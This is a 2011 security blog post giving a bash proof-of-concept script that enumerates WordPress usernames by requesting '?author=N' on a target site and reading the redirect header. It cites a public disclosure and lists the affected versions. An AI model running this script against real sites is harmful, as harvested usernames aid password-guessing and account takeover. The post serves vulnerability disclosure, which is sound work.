«
»

Hi All,

We have recently seen WordPress User name enumeration Vulnerability disclosure here http://seclists.org/fulldisclosure/2011/May/493

Versions Effected are : 2.6, 3.1, 3.1.1, 3.1.3

Here i am enclosing a simple PoC which could be run on Bash Shell.
(Note : PoC on python is already available for those who are curious)

#!/bin/bash
# WordPress User Enumeration PoC by Anant Shrivastava
# Disclosure : http://seclists.org/fulldisclosure/2011/May/493
if [ $# -ne 1 ]
then
	echo "Wordpress username enumeration PoC"
	echo "based on disclosure @ : http://seclists.org/fulldisclosure/2011/May/493 "
	echo $0 "URL of Website"
else
	count=0
	title=0
	while [ $count -lt 10 ]
	do
		result=`curl -I -s --max-time 30 --max-filesize 1 $1?author=$count | grep -F 'Location:'`
		name=`echo $result |  rev | cut -f2 -d"/" | rev`
		nm=`echo "$"$result`
		if [ "$nm" != "$" ]
		then
			if [ $title == 0 ]
			then
				echo "ID : UserName"
				title=1
			fi
			echo -n $count " : "
			echo $name
		fi
		count=`expr $count + 1`
	done
	if [ $title == 0 ]
	then
		echo "Either this site is not vulnerable or is not using wordpress hosted"
	fi
fi

Code could be download from here : wp_PoC_user_name_enum

Be Sociable, Share!

This entry was posted by anantshri on May 29, 2011 at 6:34 pm under hacking, scripting. You can leave a response, or trackback from your own site. Follow any responses to this entry through the RSS 2.0 feed.

One Comment

  1. protection wordpress username enumeration | Anant Shrivastava : Techno Enthusiast says:

    [...] my last post exploiting username enumeration i have looked deep and found a simple workaround to patch your blog for this vulnerability till [...]

    May 30, 2011, 11:24 pm

Leave a Reply

CommentLuv badge